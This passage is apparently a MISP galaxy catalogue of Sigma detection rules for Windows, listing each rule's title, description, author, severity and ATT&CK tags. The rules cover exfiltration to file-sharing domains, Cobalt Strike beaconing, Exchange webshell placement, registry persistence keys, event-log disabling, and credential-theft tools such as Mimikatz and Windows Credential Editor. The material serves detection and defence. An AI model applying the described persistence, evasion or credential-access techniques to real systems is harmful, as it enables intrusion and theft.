Metadata key Value
author Florian Roth (Nextron Systems), Gleb Sukhodolskiy, Timur Zinniatullin oscd.community
creation_date 2017/08/22
falsepositive ['Unknown (data set is too small; further testing needed)']
filename win_wmi_persistence.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1546.003']
Related clusters

To see the related clusters, click here.

DNS Query for Anonfiles.com Domain - DNS Client

Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes

Internal MISP references

UUID 29f171d7-aa47-42c7-9c7b-3c87938164d9 which can be used as unique global reference for DNS Query for Anonfiles.com Domain - DNS Client in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/16
falsepositive ['Rare legitimate access to anonfiles.com']
filename win_dns_client_anonymfiles_com.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.exfiltration', 'attack.t1567.002']
Related clusters

To see the related clusters, click here.

DNS Query To MEGA Hosting Website - DNS Client

Detects DNS queries for subdomains related to the MEGA file sharing website

Internal MISP references

UUID 66474410-b883-415f-9f8d-75345a0a66a6 which can be used as unique global reference for DNS Query To MEGA Hosting Website - DNS Client in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/16
falsepositive ['Legitimate DNS queries and usage of Mega']
filename win_dns_client_mega_nz.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.exfiltration', 'attack.t1567.002']
Related clusters

To see the related clusters, click here.

Query Tor Onion Address - DNS Client

Detects DNS resolution of a .onion address related to the Tor routing network

Internal MISP references

UUID 8384bd26-bde6-4da9-8e5d-4174a7a47ca2 which can be used as unique global reference for Query Tor Onion Address - DNS Client in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/02/20
falsepositive ['Unlikely']
filename win_dns_client_tor_onion.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.command_and_control', 'attack.t1090.003']
Related clusters

To see the related clusters, click here.

DNS Query To Ufile.io - DNS Client

Detects DNS queries to "ufile.io", which was seen abused by malware and threat actors as a method for data exfiltration

Internal MISP references

UUID 090ffaad-c01a-4879-850c-6d57da98452d which can be used as unique global reference for DNS Query To Ufile.io - DNS Client in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/16
falsepositive ['DNS queries for "ufile" are not malicious by nature necessarily. Investigate the source to determine the necessary actions to take']
filename win_dns_client_ufile_io.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.exfiltration', 'attack.t1567.002']
Related clusters

To see the related clusters, click here.

Suspicious Cobalt Strike DNS Beaconing - DNS Client

Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons

Internal MISP references

UUID 0d18728b-f5bf-4381-9dcf-915539fff6c2 which can be used as unique global reference for Suspicious Cobalt Strike DNS Beaconing - DNS Client in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/16
falsepositive ['Unknown']
filename win_dns_client__mal_cobaltstrike.yml
level critical
logsource.category No established category
logsource.product windows
tags ['attack.command_and_control', 'attack.t1071.004']
Related clusters

To see the related clusters, click here.

File Was Not Allowed To Run

Detects files that were not allowed to run. AppLocker is a very useful tool, especially on servers where unprivileged users have access, for example terminal servers. You need to configure AppLocker and log collection to receive these events.

Internal MISP references

UUID 401e5d00-b944-11ea-8f9a-00163ecd60ae which can be used as unique global reference for File Was Not Allowed To Run in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Pushkarev Dmitry
creation_date 2020/06/28
falsepositive ['Need tuning applocker or add exceptions in SIEM']
filename win_applocker_file_was_not_allowed_to_run.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.execution', 'attack.t1204.002', 'attack.t1059.001', 'attack.t1059.003', 'attack.t1059.005', 'attack.t1059.006', 'attack.t1059.007']
Related clusters

To see the related clusters, click here.

Potential Active Directory Reconnaissance/Enumeration Via LDAP

Detects potential Active Directory enumeration via LDAP

Internal MISP references

UUID 31d68132-4038-47c7-8f8e-635a39a7c174 which can be used as unique global reference for Potential Active Directory Reconnaissance/Enumeration Via LDAP in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Adeem Mawani
creation_date 2021/06/22
falsepositive No established falsepositives
filename win_ldap_recon.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.discovery', 'attack.t1069.002', 'attack.t1087.002', 'attack.t1482']
Related clusters

To see the related clusters, click here.

Uncommon AppX Package Locations

Detects an AppX package that was added to the pipeline of "to be processed" packages and is located in an uncommon location

Internal MISP references

UUID c977cb50-3dff-4a9f-b873-9290f56132f1 which can be used as unique global reference for Uncommon AppX Package Locations in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/11
falsepositive ['Unknown']
filename win_appxdeployment_server_uncommon_package_locations.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion']

Suspicious AppX Package Locations

Detects an AppX package that was added to the pipeline of "to be processed" packages and is located in a suspicious location

Internal MISP references

UUID 5cdeaf3d-1489-477c-95ab-c318559fc051 which can be used as unique global reference for Suspicious AppX Package Locations in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/11
falsepositive ['Unknown']
filename win_appxdeployment_server_susp_package_locations.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion']

Suspicious Remote AppX Package Locations

Detects an AppX package that was added to the pipeline of "to be processed" packages and was downloaded from a suspicious domain

Internal MISP references

UUID 8b48ad89-10d8-4382-a546-50588c410f0d which can be used as unique global reference for Suspicious Remote AppX Package Locations in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/11
falsepositive ['Unknown']
filename win_appxdeployment_server_susp_domains.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion']

Suspicious AppX Package Installation Attempt

Detects an AppX package installation with the error code "0x80073cff", which indicates that the package did not meet the signing requirements and could be suspicious

Internal MISP references

UUID 898d5fc9-fbc3-43de-93ad-38e97237c344 which can be used as unique global reference for Suspicious AppX Package Installation Attempt in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/11
falsepositive ['Legitimate AppX packages not signed by MS used part of an enterprise']
filename win_appxdeployment_server_susp_appx_package_installation.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion']

Deployment Of The AppX Package Was Blocked By The Policy

Detects an appx package deployment that was blocked by the local computer policy

Internal MISP references

UUID e021bbb5-407f-41f5-9dc9-1864c45a7a51 which can be used as unique global reference for Deployment Of The AppX Package Was Blocked By The Policy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2023/01/11
falsepositive ['Unknown']
filename win_appxdeployment_server_policy_block.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion']

Potential Malicious AppX Package Installation Attempts

Detects potential installation or installation attempts of known malicious appx packages

Internal MISP references

UUID 09d3b48b-be17-47f5-bf4e-94e7e75d09ce which can be used as unique global reference for Potential Malicious AppX Package Installation Attempts in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/11
falsepositive ['Rare occasions where a malicious package uses the exact same name and version as a legtimate application']
filename win_appxdeployment_server_mal_appx_names.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion']

Deployment AppX Package Was Blocked By AppLocker

Detects an appx package deployment that was blocked by AppLocker policy

Internal MISP references

UUID 6ae53108-c3a0-4bee-8f45-c7591a2c337f which can be used as unique global reference for Deployment AppX Package Was Blocked By AppLocker in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2023/01/11
falsepositive ['Unknown']
filename win_appxdeployment_server_applocker_block.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion']

Remove Exported Mailbox from Exchange Webserver

Detects removal of an exported Exchange mailbox, which could be an attempt to cover tracks after a ProxyShell exploit

Internal MISP references

UUID 09570ae5-889e-43ea-aac0-0e1221fb3d95 which can be used as unique global reference for Remove Exported Mailbox from Exchange Webserver in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/08/27
falsepositive ['Unknown']
filename win_exchange_proxyshell_remove_mailbox_export.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070']
Related clusters

To see the related clusters, click here.

Exchange Set OabVirtualDirectory ExternalUrl Property

Rule to detect an adversary setting the OabVirtualDirectory ExternalUrl property to a script, based on the Exchange Management log

Internal MISP references

UUID 9db37458-4df2-46a5-95ab-307e7f29e675 which can be used as unique global reference for Exchange Set OabVirtualDirectory ExternalUrl Property in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jose Rodriguez @Cyb3rPandaH
creation_date 2021/03/15
falsepositive ['Unknown']
filename win_exchange_set_oabvirtualdirectory_externalurl.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.t1505.003']
Related clusters

To see the related clusters, click here.

Failed MSExchange Transport Agent Installation

Detects a failed installation of an Exchange Transport Agent

Internal MISP references

UUID c7d16cae-aaf3-42e5-9c1c-fb8553faa6fa which can be used as unique global reference for Failed MSExchange Transport Agent Installation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tobias Michalski (Nextron Systems)
creation_date 2021/06/08
falsepositive ['Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this.']
filename win_exchange_transportagent_failed.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.t1505.002']
Related clusters

To see the related clusters, click here.

ProxyLogon MSExchange OabVirtualDirectory

Detects specific patterns found after a successful ProxyLogon exploitation in relation to a Commandlet invocation of Set-OabVirtualDirectory

Internal MISP references

UUID 550d3350-bb8a-4ff3-9533-2ba533f4a1c0 which can be used as unique global reference for ProxyLogon MSExchange OabVirtualDirectory in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/08/09
falsepositive ['Unlikely']
filename win_exchange_proxylogon_oabvirtualdir.yml
level critical
logsource.category No established category
logsource.product windows
tags ['attack.t1587.001', 'attack.resource_development']
Related clusters

To see the related clusters, click here.

Certificate Request Export to Exchange Webserver

Detects a write of an Exchange CSR to an atypical directory or with an .aspx name suffix, which can be used to place a webshell

Internal MISP references

UUID b7bc7038-638b-4ffd-880c-292c692209ef which can be used as unique global reference for Certificate Request Export to Exchange Webserver in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Max Altgelt (Nextron Systems)
creation_date 2021/08/23
falsepositive ['Unlikely']
filename win_exchange_proxyshell_certificate_generation.yml
level critical
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.t1505.003']
Related clusters

To see the related clusters, click here.

Mailbox Export to Exchange Webserver

Detects a successful export of an Exchange mailbox to an atypical directory or with an .aspx name suffix, which can be used to place a webshell, or the role assignment needed for such an export

Internal MISP references

UUID 516376b4-05cd-4122-bae0-ad7641c38d48 which can be used as unique global reference for Mailbox Export to Exchange Webserver in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Rich Warren, Christian Burkard (Nextron Systems)
creation_date 2021/08/09
falsepositive ['Unlikely']
filename win_exchange_proxyshell_mailbox_export.yml
level critical
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.t1505.003']
Related clusters

To see the related clusters, click here.

MSExchange Transport Agent Installation - Builtin

Detects the installation of an Exchange Transport Agent

Internal MISP references

UUID 4fe151c2-ecf9-4fae-95ae-b88ec9c2fca6 which can be used as unique global reference for MSExchange Transport Agent Installation - Builtin in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tobias Michalski (Nextron Systems)
creation_date 2021/06/08
falsepositive ['Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this.']
filename win_exchange_transportagent.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.t1505.002']
Related clusters

To see the related clusters, click here.

Exports Registry Key To an Alternate Data Stream

Detects the export of a target Registry key into a specified alternate data stream, where it is hidden.

Internal MISP references

UUID 0d7a9363-af70-4e7b-a3b7-1a176b7fbe84 which can be used as unique global reference for Exports Registry Key To an Alternate Data Stream in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Oddvar Moe, Sander Wiebing, oscd.community
creation_date 2020/10/07
falsepositive ['Unknown']
filename create_stream_hash_regedit_export_to_ads.yml
level high
logsource.category create_stream_hash
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564.004']
Related clusters

To see the related clusters, click here.

Potentially Suspicious File Download From ZIP TLD

Detects the download of a file with a potentially suspicious extension from a .zip top level domain.

Internal MISP references

UUID 0bb4bbeb-fe52-4044-b40c-430a04577ebe which can be used as unique global reference for Potentially Suspicious File Download From ZIP TLD in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2023/05/18
falsepositive ['Legitimate file downloads from a websites and web services that uses the ".zip" top level domain.']
filename create_stream_hash_zip_tld_download.yml
level high
logsource.category create_stream_hash
logsource.product windows
tags ['attack.defense_evasion']

Unusual File Download From File Sharing Websites

Detects the download of a suspicious file type from a well-known file and paste sharing domain

Internal MISP references

UUID ae02ed70-11aa-4a22-b397-c0d0e8f6ea99 which can be used as unique global reference for Unusual File Download From File Sharing Websites in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/08/24
falsepositive ['Unknown']
filename create_stream_hash_file_sharing_domains_download_unusual_extension.yml
level medium
logsource.category create_stream_hash
logsource.product windows
tags ['attack.defense_evasion', 'attack.s0139', 'attack.t1564.004']
Related clusters

To see the related clusters, click here.

HackTool Named File Stream Created

Detects the creation of a named file stream with the imphash of a well-known hack tool

Internal MISP references

UUID 19b041f6-e583-40dc-b842-d6fa8011493f which can be used as unique global reference for HackTool Named File Stream Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/08/24
falsepositive ['Unknown']
filename create_stream_hash_hktl_generic_download.yml
level high
logsource.category create_stream_hash
logsource.product windows
tags ['attack.defense_evasion', 'attack.s0139', 'attack.t1564.004']
Related clusters

To see the related clusters, click here.

Creation Of a Suspicious ADS File Outside a Browser Download

Detects the creation of a suspicious ADS (Alternate Data Stream) file by software other than browsers

Internal MISP references

UUID 573df571-a223-43bc-846e-3f98da481eca which can be used as unique global reference for Creation Of a Suspicious ADS File Outside a Browser Download in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/10/22
falsepositive ['Other legitimate browsers not currently included in the filter (please add them)', "Legitimate downloads via scripting or command-line tools (Investigate to determine if it's legitimate)"]
filename create_stream_hash_creation_internet_file.yml
level medium
logsource.category create_stream_hash
logsource.product windows
tags ['attack.defense_evasion']

Suspicious File Download From File Sharing Websites

Detects the download of a suspicious file type from a well-known file and paste sharing domain

Internal MISP references

UUID 52182dfb-afb7-41db-b4bc-5336cb29b464 which can be used as unique global reference for Suspicious File Download From File Sharing Websites in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/08/24
falsepositive ['Some false positives might occur with binaries download via Github']
filename create_stream_hash_file_sharing_domains_download_susp_extension.yml
level high
logsource.category create_stream_hash
logsource.product windows
tags ['attack.defense_evasion', 'attack.s0139', 'attack.t1564.004']
Related clusters

To see the related clusters, click here.

Unusual File Download from Direct IP Address

Detects the download of a suspicious file type from URLs that use a raw IP address instead of a hostname

Internal MISP references

UUID 025bd229-fd1f-4fdb-97ab-20006e1a5368 which can be used as unique global reference for Unusual File Download from Direct IP Address in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)
creation_date 2022/09/07
falsepositive ['Unknown']
filename create_stream_hash_susp_ip_domains.yml
level high
logsource.category create_stream_hash
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564.004']
Related clusters

To see the related clusters, click here.

Potential Suspicious Winget Package Installation

Detects a potentially suspicious winget package installation from a suspicious source.

Internal MISP references

UUID a3f5c081-e75b-43a0-9f5b-51f26fe5dba2 which can be used as unique global reference for Potential Suspicious Winget Package Installation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/04/18
falsepositive ['Unknown']
filename create_stream_hash_winget_susp_package_source.yml
level high
logsource.category create_stream_hash
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence']

Hidden Executable In NTFS Alternate Data Stream

Detects the creation of an ADS (Alternate Data Stream) that contains an executable by looking at a non-empty Imphash

Internal MISP references

UUID b69888d4-380c-45ce-9cf9-d9ce46e67821 which can be used as unique global reference for Hidden Executable In NTFS Alternate Data Stream in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), @0xrawsec
creation_date 2018/06/03
falsepositive ["This rule isn't looking for any particular binary characteristics. As legitimate installers and programs were seen embedding hidden binaries in their ADS. Some false positives are expected from browser processes and similar."]
filename create_stream_hash_ads_executable.yml
level medium
logsource.category create_stream_hash
logsource.product windows
tags ['attack.defense_evasion', 'attack.s0139', 'attack.t1564.004']
Related clusters

To see the related clusters, click here.

Office Application Startup - Office Test

Detects the addition of the Office Test registry key, which allows a user to specify an arbitrary DLL that will be executed every time an Office application is started

Internal MISP references

UUID 3d27f6dd-1c74-4687-b4fa-ca849d128d1c which can be used as unique global reference for Office Application Startup - Office Test in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author omkar72
creation_date 2020/10/25
falsepositive ['Unlikely']
filename registry_event_office_test_regadd.yml
level medium
logsource.category registry_event
logsource.product windows
tags ['attack.persistence', 'attack.t1137.002']
Related clusters

To see the related clusters, click here.

RedMimicry Winnti Playbook Registry Manipulation

Detects actions caused by the RedMimicry Winnti playbook

Internal MISP references

UUID 5b175490-b652-4b02-b1de-5b5b4083c5f8 which can be used as unique global reference for RedMimicry Winnti Playbook Registry Manipulation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alexander Rausch
creation_date 2020/06/24
falsepositive ['Unknown']
filename registry_event_redmimicry_winnti_reg.yml
level high
logsource.category registry_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Suspicious Camera and Microphone Access

Detects processes accessing the camera and microphone from a suspicious folder

Internal MISP references

UUID 62120148-6b7a-42be-8b91-271c04e281a3 which can be used as unique global reference for Suspicious Camera and Microphone Access in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Den Iuzvyk
creation_date 2020/06/07
falsepositive ['Unlikely, there could be conferencing software running from a Temp folder accessing the devices']
filename registry_event_susp_mic_cam_access.yml
level high
logsource.category registry_event
logsource.product windows
tags ['attack.collection', 'attack.t1125', 'attack.t1123']
Related clusters

To see the related clusters, click here.

Enable Remote Connection Between Anonymous Computer - AllowAnonymousCallback

Detects enabling of the "AllowAnonymousCallback" registry value, which allows a remote connection between computers that do not have a trust relationship.

Internal MISP references

UUID 4d431012-2ab5-4db7-a84e-b29809da2172 which can be used as unique global reference for Enable Remote Connection Between Anonymous Computer - AllowAnonymousCallback in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/11/03
falsepositive ['Administrative activity']
filename registry_set_enable_anonymous_connection.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

New PortProxy Registry Entry Added

Detects the modification of the PortProxy registry key which is used for port forwarding.

Internal MISP references

UUID a54f842a-3713-4b45-8c84-5f136fdebd3c which can be used as unique global reference for New PortProxy Registry Entry Added in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Andreas Hunkeler (@Karneades)
creation_date 2021/06/22
falsepositive ['WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)', 'Synergy Software KVM (https://symless.com/synergy)']
filename registry_event_portproxy_registry_key.yml
level medium
logsource.category registry_event
logsource.product windows
tags ['attack.lateral_movement', 'attack.defense_evasion', 'attack.command_and_control', 'attack.t1090']
Related clusters

To see the related clusters, click here.

Registry Persistence Mechanisms in Recycle Bin

Detects persistence registry keys for Recycle Bin

Internal MISP references

UUID 277efb8f-60be-4f10-b4d3-037802f37167 which can be used as unique global reference for Registry Persistence Mechanisms in Recycle Bin in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/11/18
falsepositive ['Unknown']
filename registry_event_persistence_recycle_bin.yml
level high
logsource.category registry_event
logsource.product windows
tags ['attack.persistence', 'attack.t1547']
Related clusters

To see the related clusters, click here.

DLL Load via LSASS

Detects a method of loading a DLL via the LSASS process using an undocumented registry key

Internal MISP references

UUID b3503044-60ce-4bf4-bbcb-e3db98788823 which can be used as unique global reference for DLL Load via LSASS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/10/16
falsepositive ['Unknown']
filename registry_event_susp_lsass_dll_load.yml
level high
logsource.category registry_event
logsource.product windows
tags ['attack.execution', 'attack.persistence', 'attack.t1547.008']
Related clusters

To see the related clusters, click here.

Path To Screensaver Binary Modified

Detects modification of the registry value containing the path to the binary used as the screensaver.

Internal MISP references

UUID 67a6c006-3fbe-46a7-9074-2ba3b82c3000 which can be used as unique global reference for Path To Screensaver Binary Modified in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bartlomiej Czyz @bczyz1, oscd.community
creation_date 2020/10/11
falsepositive ['Legitimate modification of screensaver']
filename registry_event_modify_screensaver_binary_path.yml
level medium
logsource.category registry_event
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1546.002']
Related clusters

To see the related clusters, click here.

PrinterNightmare Mimikatz Driver Name

Detects the static "QMS 810" and "mimikatz" driver names used by Mimikatz when exploiting CVE-2021-1675 and CVE-2021-34527

Internal MISP references

UUID ba6b9e43-1d45-4d3c-a504-1043a64c8469 which can be used as unique global reference for PrinterNightmare Mimikatz Driver Name in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Markus Neis, @markus_neis, Florian Roth
creation_date 2021/07/04
falsepositive ['Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely)']
filename registry_event_mimikatz_printernightmare.yml
level critical
logsource.category registry_event
logsource.product windows
tags ['attack.execution', 'attack.t1204', 'cve.2021.1675', 'cve.2021.34527']
Related clusters

To see the related clusters, click here.

Suspicious Run Key from Download

Detects suspicious Run keys created by software located in the Downloads folder or in temporary Outlook/Internet Explorer directories

Internal MISP references

UUID 9c5037d1-c568-49b3-88c7-9846a5bdc2be which can be used as unique global reference for Suspicious Run Key from Download in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/10/01
falsepositive ['Software installers downloaded and used by users']
filename registry_event_susp_download_run_key.yml
level high
logsource.category registry_event
logsource.product windows
tags ['attack.persistence', 'attack.t1547.001']
Related clusters

To see the related clusters, click here.

Windows Registry Trust Record Modification

Alerts on trust record modification within the registry, indicating usage of macros

Internal MISP references

UUID 295a59c1-7b79-4b47-a930-df12c15fc9c2 which can be used as unique global reference for Windows Registry Trust Record Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Antonlovesdnb, Trent Liffick (@tliffick)
creation_date 2020/02/19
falsepositive ['This will alert on legitimate macro usage as well, additional tuning is required']
filename registry_event_office_trust_record_modification.yml
level medium
logsource.category registry_event
logsource.product windows
tags ['attack.initial_access', 'attack.t1566.001']
Related clusters

To see the related clusters, click here.

Run Once Task Configuration in Registry

Detects the configuration of the RunOnce registry key. The configured payload can be run via runonce.exe /AlternateShellStartup

Internal MISP references

UUID c74d7efc-8826-45d9-b8bb-f04fac9e4eff which can be used as unique global reference for Run Once Task Configuration in Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Avneet Singh @v3t0_, oscd.community
creation_date 2020/11/15
falsepositive ['Legitimate modification of the registry key by legitimate program']
filename registry_event_runonce_persistence.yml
level medium
logsource.category registry_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

New DLL Added to AppCertDlls Registry Key

Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.

Internal MISP references

UUID 6aa1d992-5925-4e9f-a49b-845e51d1de01 which can be used as unique global reference for New DLL Added to AppCertDlls Registry Key in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ilyas Ochkov, oscd.community
creation_date 2019/10/25
falsepositive ['Unknown']
filename registry_event_new_dll_added_to_appcertdlls_registry_key.yml
level medium
logsource.category registry_event
logsource.product windows
tags ['attack.persistence', 'attack.t1546.009']
Related clusters

To see the related clusters, click here.

Potential Qakbot Registry Activity

Detects a registry key used by IcedID in a campaign that distributes malicious OneNote files

Internal MISP references

UUID 1c8e96cd-2bed-487d-9de0-b46c90cade56 which can be used as unique global reference for Potential Qakbot Registry Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Hieu Tran
creation_date 2023/03/13
falsepositive ['Unknown']
filename registry_event_malware_qakbot_registry.yml
level high
logsource.category registry_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Disable Security Events Logging Adding Reg Key MiniNt

Detects the addition of a key named 'MiniNt' to the registry. Upon a reboot, the Windows Event Log service will stop writing events.

Internal MISP references

UUID 919f2ef0-be2d-4a7a-b635-eb2b41fde044 which can be used as unique global reference for Disable Security Events Logging Adding Reg Key MiniNt in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ilyas Ochkov, oscd.community
creation_date 2019/10/25
falsepositive ['Unknown']
filename registry_event_disable_security_events_logging_adding_reg_key_minint.yml
level high
logsource.category registry_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Creation of a Local Hidden User Account by Registry

Detects the creation of a local hidden user account via Sysmon registry events.

Internal MISP references

UUID 460479f3-80b7-42da-9c43-2cc1d54dbccd which can be used as unique global reference for Creation of a Local Hidden User Account by Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/05/03
falsepositive ['Unknown']
filename registry_event_add_local_hidden_user.yml
level high
logsource.category registry_event
logsource.product windows
tags ['attack.persistence', 'attack.t1136.001']
Related clusters

To see the related clusters, click here.

Windows Credential Editor Registry

Detects the use of Windows Credential Editor (WCE)

Internal MISP references

UUID a6b33c02-8305-488f-8585-03cb2a7763f2 which can be used as unique global reference for Windows Credential Editor Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/12/31
falsepositive ['Unknown']
filename registry_event_hack_wce_reg.yml
level critical
logsource.category registry_event
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001', 'attack.s0005']
Related clusters

To see the related clusters, click here.

Security Support Provider (SSP) Added to LSA Configuration

Detects the addition of an SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.

Internal MISP references

UUID eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc which can be used as unique global reference for Security Support Provider (SSP) Added to LSA Configuration in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author iwillkeepwatch
creation_date 2019/01/18
falsepositive ['Unknown']
filename registry_event_ssp_added_lsa_config.yml
level high
logsource.category registry_event
logsource.product windows
tags ['attack.persistence', 'attack.t1547.005']
Related clusters

To see the related clusters, click here.

Leviathan Registry Key Activity

Detects a registry key used by the Leviathan APT in a Malaysia-focused campaign

Internal MISP references

UUID 70d43542-cd2d-483c-8f30-f16b436fd7db which can be used as unique global reference for Leviathan Registry Key Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Aidan Bracher
creation_date 2020/07/07
falsepositive No established falsepositives
filename registry_event_apt_leviathan.yml
level critical
logsource.category registry_event
logsource.product windows
tags ['attack.persistence', 'attack.t1547.001']
Related clusters

To see the related clusters, click here.

OceanLotus Registry Activity

Detects registry keys created in OceanLotus (also known as APT32) attacks

Internal MISP references

UUID 4ac5fc44-a601-4c06-955b-309df8c4e9d4 which can be used as unique global reference for OceanLotus Registry Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author megan201296, Jonhnathan Ribeiro
creation_date 2019/04/14
falsepositive ['Unknown']
filename registry_event_apt_oceanlotus_registry.yml
